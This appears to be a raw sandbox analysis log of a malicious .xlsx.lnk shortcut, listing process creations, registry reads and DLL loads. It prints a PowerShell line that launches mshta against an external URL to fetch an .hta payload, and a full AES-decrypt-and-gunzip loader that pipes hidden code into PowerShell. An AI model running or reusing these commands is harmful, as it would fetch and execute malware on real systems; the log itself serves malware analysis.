                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7696:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3720:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bx55tq2v.0tl.ps1Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\UcvuiswbO.bat" "
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCommand line argument: 08A23_2_00413780
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCommand line argument: 08A23_2_00413780
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCommand line argument: 08A23_1_00413780
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pifCommand line argument: 08A25_2_00413780
                    Source: C:\Users\user\AppData\Roaming\uc.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. 
Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                    Source: FT. 40FE CNY .xlsx.lnk | ReversingLabs: Detection: 31%
                    Source: FT. 40FE CNY .xlsx.lnk | Virustotal: Detection: 24%
                    Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/yt.hta
                    Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\uc.exe "C:\Users\user\AppData\Roaming\uc.exe"
                    Source: C:\Users\user\AppData\Roaming\uc.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\UcvuiswbO.bat" "
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\uc.exe | Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\uc.exe C:\\Users\\Public\\Libraries\\Ucvuiswb.PIF
                    Source: C:\Users\user\AppData\Roaming\uc.exe | Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
                    Source: unknown | Process created: C:\Users\Public\Libraries\Ucvuiswb.PIF "C:\Users\Public\Libraries\Ucvuiswb.PIF"
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIF | Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
                    Source: unknown | Process created: C:\Users\Public\Libraries\Ucvuiswb.PIF "C:\Users\Public\Libraries\Ucvuiswb.PIF"
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIF | Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/yt.hta
                    Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = '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';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\uc.exe "C:\Users\user\AppData\Roaming\uc.exe"
                    Source: C:\Users\user\AppData\Roaming\uc.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\UcvuiswbO.bat" "
                    Source: C:\Users\user\AppData\Roaming\uc.exe | Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\uc.exe C:\\Users\\Public\\Libraries\\Ucvuiswb.PIF
                    Source: C:\Users\user\AppData\Roaming\uc.exe | Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIF | Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
                    Source: C:\Users\Public\Libraries\Ucvuiswb.PIF | Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: wldp.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: mshtml.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: iertutil.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: powrprof.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: winhttp.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: wkscli.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: netutils.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: umpdc.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: urlmon.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: msiso.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: srpapi.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: wininet.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: wldp.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: profapi.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: mswsock.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: iphlpapi.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: winnsi.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: ieframe.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: netapi32.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: version.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: userenv.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: dnsapi.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: msimtf.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: rasadhlp.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: dxgi.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: resourcepolicyclient.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: textinputframework.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: coreuicomponents.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: coremessaging.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: ntmarta.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: dataexchange.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: d3d11.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: dcomp.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: twinapi.appcore.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: schannel.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: mskeyprotect.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: ntasn1.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: msasn1.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: dpapi.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: ncrypt.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: ncryptsslp.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exe    Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: qmgr.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: bitsperf.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: powrprof.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: xmllite.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: firewallapi.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: esent.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: umpdc.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: dnsapi.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: iphlpapi.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: fwbase.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: wldp.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: ntmarta.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: profapi.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: flightsettings.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: netprofm.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: npmproxy.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: bitsigd.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: upnp.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: winhttp.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: ssdpapi.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: urlmon.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: iertutil.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: srvcli.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: netutils.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: appxdeploymentclient.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: wsmauto.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: miutils.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: wsmsvc.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: dsrole.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: pcwum.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: mi.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: userenv.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: gpapi.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: winhttp.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: wkscli.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: netutils.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: sspicli.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: msv1_0.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: ntlmshared.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: cryptdll.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: webio.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: mswsock.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: winnsi.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: rasadhlp.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: rmclient.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: usermgrcli.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: execmodelclient.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: propsys.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: coremessaging.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: twinapi.appcore.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: execmodelproxy.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: resourcepolicyclient.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: vssapi.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: vsstrace.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: samcli.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: samlib.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: es.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: bitsproxy.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: schannel.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: mskeyprotect.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: ntasn1.dll
                    Source: C:\Windows\System32\svchost.exe    Section loaded: ncrypt.dll
